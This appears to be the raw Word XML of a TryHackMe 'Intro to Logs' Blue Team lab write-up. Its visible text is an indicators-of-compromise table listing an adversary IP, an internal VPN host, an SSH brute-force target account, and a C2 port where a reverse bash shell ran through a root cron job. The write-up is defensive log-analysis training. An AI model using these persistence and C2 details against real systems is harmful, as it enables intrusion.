              <w:t>34.253.159.159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C887" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Adversary IP. Web scanner, C2 reverse shell destination.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="5A059B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932B" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP — Internal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95FD" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E63946"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.10.133.168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1DBAE" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VPN-segment device used during GitLab intrusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="4F406B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ADAEE" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20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AAB0" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E63946"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>stansimon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EDB0" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target of brute-force SSH campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00623223" w14:paraId="17976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63D2" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 Channel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781D" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E63946"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>34.253.159.159:9999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697B9" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse bash shell established via root cron job.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2762B42A" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00623223">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A66669" w14:textId="77777777" w:rsidR="00623223" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="6" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="BBBBBB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>zenmier30  ·  TryHackMe  ·  Intro to Logs  ·  Blue Team</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00623223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EF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A154904C"/>
    <w:lvl w:ilvl="0" w:tplc="2A742CD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540" w:hanging="260"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E19CCDD8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="800E113C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7EF28C88">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E3C8F762">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="ED4071C4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FC6C73B4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5C12B606">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AFBA20AC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51091A79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84BE12AE"/>
    <w:lvl w:ilvl="0" w:tplc="0A84BD80">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6916CFA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="09C4F932">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9C643988">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8004A5AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9F0E701A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FE9AF1D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BAA62872">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E6503C1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="53623024">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="943608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223"/>
    <w:rsid w:val="00623223"/>
    <w:rsid w:val="006F1D36"/>
    <w:rsid w:val="00D4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C743"/>
  <w15:docId w15:val="{DC40B389-A970-4552-A20C-29841C276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Ryonan FAD</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-27T05:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-27T06:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>